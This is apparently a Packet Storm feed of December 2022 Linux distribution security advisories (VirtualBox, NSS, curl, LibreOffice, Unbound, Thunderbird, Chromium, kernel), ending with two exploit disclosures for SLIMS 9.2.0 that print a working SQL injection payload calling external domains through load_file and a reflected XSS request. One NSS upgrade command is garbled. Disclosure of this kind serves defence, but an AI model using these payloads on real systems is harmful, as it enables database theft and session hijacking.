Gentoo Linux Security Advisory 202212-3 - Multiple vulnerabilities have been discovered in Oracle Virtualbox, the worst of which could result in privilege escalation from a guest to the host. Versions less than 6.1.40 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202212-03  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Oracle VirtualBox: Multiple Vulnerabilities  
     Date: December 19, 2022  
     Bugs: #877601  
       ID: 202212-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Oracle Virtualbox, the  
worst of which could result in privilege escalation from a guest to the  
host.

Background  
=========  
VirtualBox is a powerful virtualization product from Oracle.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  app-emulation/virtualbox         < 6.1.40              >= 6.1.40  
  2  app-emulation/virtualbox-modules < 6.1.40              >= 6.1.40

Description  
==========  
Multiple vulnerabilities have been discovered in Oracle VirtualBox.  
Please review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Oracle VirtualBox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-emulation/virtualbox-6.1.40"

All Oracle VirtualBox modules users should upgrade to the latest  
version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-emulation/virtualbox-modules-6.1.40"

References  
=========  
[ 1 ] CVE-2022-21620  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21620  
[ 2 ] CVE-2022-21621  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21621  
[ 3 ] CVE-2022-21627  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21627  
[ 4 ] CVE-2022-39421  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39421  
[ 5 ] CVE-2022-39422  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39422  
[ 6 ] CVE-2022-39423  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39423  
[ 7 ] CVE-2022-39424  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39424  
[ 8 ] CVE-2022-39425  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39425  
[ 9 ] CVE-2022-39426  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39426

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202212-03

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202212-03

Gentoo Linux Security Advisory 202212-5 - Multiple vulnerabilities have been discovered in NSS, the worst of which could result in arbitrary code execution. Versions less than 3.79.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202212-05  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Network Security Service (NSS): Multiple Vulnerabilities  
     Date: December 19, 2022  
     Bugs: #827946, #836386, #848984, #877169  
       ID: 202212-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in NSS, the worst of which  
could result in arbitrary code execution.

Background  
=========  
The Mozilla Network Security Service is a library implementing security  
features like SSL v.2/v.3, TLS, PKCS #5, PKCS #7, PKCS #11, PKCS #12,  
S/MIME and X.509 certificates.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-libs/nss               < 3.79.2                    >= 3.79.2

Description  
==========  
Multiple vulnerabilities have been discovered in Mozilla Network  
Security Service (NSS). Please review the CVE identifiers referenced  
below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Mozilla Network Security Service (NSS) users should upgrade to the  
latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-libs/nss-3.79.2"

References  
=========  
[ 1 ] CVE-2021-43527  
      https://nvd.nist.gov/vuln/detail/CVE-2021-43527  
[ 2 ] CVE-2022-1097  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1097  
[ 3 ] CVE-2022-3479  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3479  
[ 4 ] MFSA-2021-51

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202212-05

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202212-05

Gentoo Linux Security Advisory 202212-1 - Multiple vulnerabilities have been found in curl, the worst of which could result in arbitrary code execution. Versions less than 7.86.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202212-01  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: curl: Multiple Vulnerabilities  
     Date: December 19, 2022  
     Bugs: #803308, #813270, #841302, #843824, #854708, #867679, #878365  
       ID: 202212-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been found in curl, the worst of which  
could result in arbitrary code execution.

Background  
=========  
A command line tool and library for transferring data with URLs.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  net-misc/curl              < 7.86.0                    >= 7.86.0

Description  
==========  
Multiple vulnerabilities have been discovered in curl. Please review the  
CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All curl users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-misc/curl-7.86.0"

References  
=========  
[ 1 ] CVE-2021-22922  
      https://nvd.nist.gov/vuln/detail/CVE-2021-22922  
[ 2 ] CVE-2021-22923  
      https://nvd.nist.gov/vuln/detail/CVE-2021-22923  
[ 3 ] CVE-2021-22925  
      https://nvd.nist.gov/vuln/detail/CVE-2021-22925  
[ 4 ] CVE-2021-22926  
      https://nvd.nist.gov/vuln/detail/CVE-2021-22926  
[ 5 ] CVE-2021-22945  
      https://nvd.nist.gov/vuln/detail/CVE-2021-22945  
[ 6 ] CVE-2021-22946  
      https://nvd.nist.gov/vuln/detail/CVE-2021-22946  
[ 7 ] CVE-2021-22947  
      https://nvd.nist.gov/vuln/detail/CVE-2021-22947  
[ 8 ] CVE-2022-22576  
      https://nvd.nist.gov/vuln/detail/CVE-2022-22576  
[ 9 ] CVE-2022-27774  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27774  
[ 10 ] CVE-2022-27775  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27775  
[ 11 ] CVE-2022-27776  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27776  
[ 12 ] CVE-2022-27779  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27779  
[ 13 ] CVE-2022-27780  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27780  
[ 14 ] CVE-2022-27781  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27781  
[ 15 ] CVE-2022-27782  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27782  
[ 16 ] CVE-2022-30115  
      https://nvd.nist.gov/vuln/detail/CVE-2022-30115  
[ 17 ] CVE-2022-32205  
      https://nvd.nist.gov/vuln/detail/CVE-2022-32205  
[ 18 ] CVE-2022-32206  
      https://nvd.nist.gov/vuln/detail/CVE-2022-32206  
[ 19 ] CVE-2022-32207  
      https://nvd.nist.gov/vuln/detail/CVE-2022-32207  
[ 20 ] CVE-2022-32208  
      https://nvd.nist.gov/vuln/detail/CVE-2022-32208  
[ 21 ] CVE-2022-32221  
      https://nvd.nist.gov/vuln/detail/CVE-2022-32221  
[ 22 ] CVE-2022-35252  
      https://nvd.nist.gov/vuln/detail/CVE-2022-35252  
[ 23 ] CVE-2022-35260  
      https://nvd.nist.gov/vuln/detail/CVE-2022-35260  
[ 24 ] CVE-2022-42915  
      https://nvd.nist.gov/vuln/detail/CVE-2022-42915  
[ 25 ] CVE-2022-42916  
      https://nvd.nist.gov/vuln/detail/CVE-2022-42916

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202212-01

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202212-01

Gentoo Linux Security Advisory 202212-4 - A vulnerability has been discovered in LibreOffice which could result in arbitrary script execution via crafted links. Versions less than 7.3.6.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202212-04  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: LibreOffice: Arbitrary Code Execution  
     Date: December 19, 2022  
     Bugs: #876869  
       ID: 202212-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been discovered in LibreOffice which could result in  
arbitrary script execution via crafted links.

Background  
=========  
LibreOffice is a powerful office suite; its clean interface and powerful  
tools let you unleash your creativity and grow your productivity.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  app-office/libreoffice     < 7.3.6.2                  >= 7.3.6.2  
  2  app-office/libreoffice-bin < 7.3.6.2                  >= 7.3.6.2

Description  
==========  
LibreOffice links using the vnd.libreoffice.command scheme could be  
constructed to call internal macros with arbitrary arguments. Which when  
clicked on, or activated by document events, could result in arbitrary  
script execution without warning.

Impact  
=====  
An attacker able to coerce a victim into opening a crafted LibreOffice  
document and execute certain actions with it could achieve remote code  
execution.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All LibreOffice users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-office/libreoffice-7.3.6.2"

All LibreOffice binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-office/libreoffice-bin-7.3.6.2"

References  
=========  
[ 1 ] CVE-2022-3140  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3140

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202212-04

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202212-04

Gentoo Linux Security Advisory 202212-2 - Multiple vulnerabilities have been discovered in Unbound, the worst of which could result in denial of service. Versions less than 1.16.3 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202212-02  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Unbound: Multiple Vulnerabilities  
     Date: December 19, 2022  
     Bugs: #872209, #866881  
       ID: 202212-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Unbound, the worst of  
which could result in denial of service.

Background  
=========  
Unbound is a validating, recursive, and caching DNS resolver.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  net-dns/unbound            < 1.16.3                    >= 1.16.3

Description  
==========  
Multiple vulnerabilities have been discovered in Unbound. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Unbound users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-dns/unbound-1.16.3"

References  
=========  
[ 1 ] CVE-2022-3204  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3204  
[ 2 ] CVE-2022-30698  
      https://nvd.nist.gov/vuln/detail/CVE-2022-30698  
[ 3 ] CVE-2022-30699  
      https://nvd.nist.gov/vuln/detail/CVE-2022-30699

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202212-02

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202212-02

Debian Linux Security Advisory 5303-1 - Multiple security issues were discovered in Thunderbird, which could result in the execution of arbitrary code or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5303-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffDecember 16, 2022                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : thunderbirdCVE ID         : CVE-2022-46882 CVE-2022-46881 CVE-2022-46880 CVE-2022-46878                 CVE-2022-46874 CVE-2022-46872 CVE-2022-45414Multiple security issues were discovered in Thunderbird, which couldresult in the execution of arbitrary code or information disclosure.For the stable distribution (bullseye), this problem has been fixed inversion 1:102.6.0-1~deb11u1.We recommend that you upgrade your thunderbird packages.For the detailed security status of thunderbird please refer toits security tracker page at:https://security-tracker.debian.org/tracker/thunderbirdFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmOcwVkACgkQEMKTtsN8TjYhNA//e9mQQto3dcqum+DpkqlxnQ0oJZW90A4qnpdorbSH6AuQodiaMXYrhZ1y7LaCCZd2LgxwIOoW5ukYto7TGGWA+bU8VtdivVKEVJ52dwyzFhp1PMhn81Lr+DRgNf9vYTGO3MYnThKckNhkGPN2qQtxABoBA+opJJIFq7yJW34NEhhWNoH0ubGmCie/13l5msZmN1pYALhsDs1Li7yotVtIRU6r5/t4BUwI0hyfLaR0HDcpeT8iAnyuedMcXF+jFF0B8HQfkakNOc4fODcpiNVW6FAezRPprCTCqpuIr8Ic7yrYWYlAjayLRBbp277JXESFk16Oao/OR0Qf4SpfhDCw3IZwG6A0De4e7nVxunIkjShU9tfzjx5LPeiGqQkXiS2abklARfRUqFeqPFQJbF+CA7lHZiCWm/LXtOjArkIvZ7j1BNcdPmhe/OAJ04zi1j2aKxNxvKAwBK065N1pSn9iS9zvGva7rcenKYnd8kkdExHSnWCCuo79otgKWQ6az/zIdfwY8MU7xxCo04pNnBH+fUAk4sDZGzjfebuqWuUZQ6KK1uo0w6Ji10zriQ2bJ94eYuptBEZttovyjj7SbOAuAB2zpchHT2TlifpgoTmywRNsMceqDNvzbgTCwMEP30TYXOyiunxOs2AgL/6hFAfZ3oTfpxqjuscKCkfi1pwaYjM=YY+h-----END PGP SIGNATURE-----

Debian Security Advisory 5303-1

Debian Linux Security Advisory 5302-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5302-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffDecember 16, 2022                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2022-4436 CVE-2022-4437 CVE-2022-4438 CVE-2022-4439                 CVE-2022-4440Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bullseye), these problems have been fixed inversion 108.0.5359.124-1~deb11u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmOcwUwACgkQEMKTtsN8TjaEDhAAuNgbC9i9I5soJN7677urAmv/mzR20/hpcEx4WlrS5YlCMBISsolvytNClMnzfVIe8e0akdshGTtGmehUco7gxXRq7Ab+kCDMFgXrPCf+SDXFbECLR/xtrTGuahzPmrDBwz/5O3gOFcJaEhXoLUER1Xm2UX8MgMlV/pfv8UN0keXriJSS/nWVU5sp8UCfafYxa/cNB51k7VmQTEDL56zcE64zZxXmmfNDvNv9/FHiMHZyATZv499nfEVaI0qvLot/trilA2X6/Wn5aFJD7cRk7PWJR6fzMs36Ad4E9Ww5/mDy6ADKORyRhiHbpw+wRCgs253pkDvwExVTwu2BGsXp9ThnVIHRXflN0GaixsDUryA3x0IRCTiWpNU+armowtAS7I31kht91uPhJaaK3DoB/xgqRbNBHeZnl8NqAaf76ODSGAbjcoUxLXrEb+zD9dLbFuDnfapfeqKCDuZAkeBv9k9etvMTuBTb4KjvA/OfhFTYpF8EJ2+o4RTBqf2vNlEWhSLqXY/ehr6LygFnHlBnrR+SQPUfEQywHEMRa+4DqyWtf25mZKkVl1AdhMqXBF6Rsht0UBOUu2M2g4NOtk/1S34EhPeEhZLSh+Z3XhoIj/UfQLcOgMEQCBHuz1S5tXyLqQCwbpi/Pm+lSI99fPooTH5UoJpDj2cGygXfNysjKq0=kfqY-----END PGP SIGNATURE-----

Debian Security Advisory 5302-1

Ubuntu Security Notice 5783-1 - Tamás Koczka discovered that the Bluetooth L2CAP handshake implementation in the Linux kernel contained multiple use-after-free vulnerabilities. A physically proximate attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5783-1December 16, 2022linux-oem-5.17 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:The system could be made to crash or run programs as an administrator.Software Description:- linux-oem-5.17: Linux kernel for OEM systemsDetails:Tamás Koczka discovered that the Bluetooth L2CAP handshake implementationin the Linux kernel contained multiple use-after-free vulnerabilities. Aphysically proximate attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-5.17.0-1025-oem     5.17.0-1025.26   linux-image-oem-22.04           5.17.0.1025.23   linux-image-oem-22.04a          5.17.0.1025.23After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-5783-1   CVE-2022-42896Package Information:   https://launchpad.net/ubuntu/+source/linux-oem-5.17/5.17.0-1025.26

Ubuntu Security Notice USN-5783-1

Senayan Library Management System version 9.2.0 suffers from a remote SQL Injection vulnerability.

    ## Title: Senayan Library Management System v9.2.0 a.k.a SLIMS 9 SQLi## Author: nu11secur1ty## Date: 12.19.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.2.0## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.0/SQLi## Description:The manual insertion `point 5` appears to be vulnerable to SQLinjection attacks. The payload '+(selectload_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.stupid.com\\dzd'))+'was submitted in the manual insertion `point 5`.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The application interacted with that domain, indicating that theinjected SQL query was executed.The attacker can take information from all database columns of thissystem by using this vulnerability.## STATUS: HIGH Vulnerability - CRITICAL[+] Payload:```MySQL---Parameter: class (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause    Payload: reportView=true&year=2002&class=bbbb'+(selectload_file('\\\\716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+''RLIKE (SELECT (CASE WHEN (8839=8839) THEN 0x62626262+(selectload_file(0x5c5c5c5c37313667623163666539676b6a61347a646a34357178783932303876776c6b636e30656e3662762e736c696d732e7765622e69645c5c6e6271))+''ELSE 0x28 END)) AND'IzAa'='IzAa&membershipType=a''&collType=aaaa'+(selectload_file('\\\\dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id\\wtf'))+''+(selectload_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id\\dzd'))+'---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.0/SQLi)## Proof and Exploit:[href](https://streamable.com/jy5pql)## Time spent`00:10:00`## Writing an exploit`00:05:00`

Senayan Library Management System 9.2.0 SQL Injection

Senayan Library Management System version 9.2.0 suffers from a cross site scripting vulnerability.

    ## Title: Senayan Library Management System v9.2.0 a.k.a SLIMS 9 XSS-Reflected - inserting gif - redirect to outside HTTPS server## Author: nu11secur1ty## Date: 12.19.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.2.0## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.0## Description:The value of manual insertion `point 3` is copied into the HTMLdocument as plain text between tags.The payload t8xqv<script>alert(1)</script>uou2q was submitted in themanual insertion `point 3`.This input was echoed unmodified in the application's response.The attacker can trick the already authenticated users to visit anvery dangerous web page ot malicious javascript exploit.## STATUS: HIGH Vulnerability[+] Payloads:```GETGET /slims9_bulian-9.2.0/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%62%62%62%62%27%2b%28%73%65%6c%65%63%74%20%6c%6f%61%64%5f%66%69%6c%65%28%27%5c%5c%5c%5c%37%31%36%67%62%31%63%66%65%39%67%6b%6a%61%34%7a%64%6a%34%35%71%78%78%39%32%30%38%76%77%6c%6b%63%6e%30%65%6e%36%62%76%2e%73%6c%69%6d%73%2e%77%65%62%2e%69%64%5c%5c%6e%62%71%27%29%29%2b%27%74%38%78%71%76%3c%64%69%76%3e%3c%69%6d%61%67%65%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%67%69%70%68%79%2e%63%6f%6d%2f%6d%65%64%69%61%2f%62%54%42%79%75%74%61%6d%4a%53%6a%68%53%2f%67%69%70%68%79%2e%67%69%66%20%6f%6e%6c%6f%61%64%73%74%61%72%74%3d%61%6c%65%72%74%28%31%33%33%37%29%3e%68%65%6c%6c%6f%20%66%72%6f%6d%20%6e%75%31%31%73%65%63%75%72%31%74%79%3c%2f%64%69%76%3e%3c%2f%73%63%72%69%70%74%3e%75%6f%75%32%0a&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id%5c%5cwtf%27))%2b%27HTTP/1.1Host: pwnedhost.comCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=i6ml8c8i4dmi37vtcpnnf9jhm9; admin_logged_in=1Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.0)## Proof and Exploit:[href](https://streamable.com/5smxxm)## Time spent`02:35:00`

Source

Packet Storm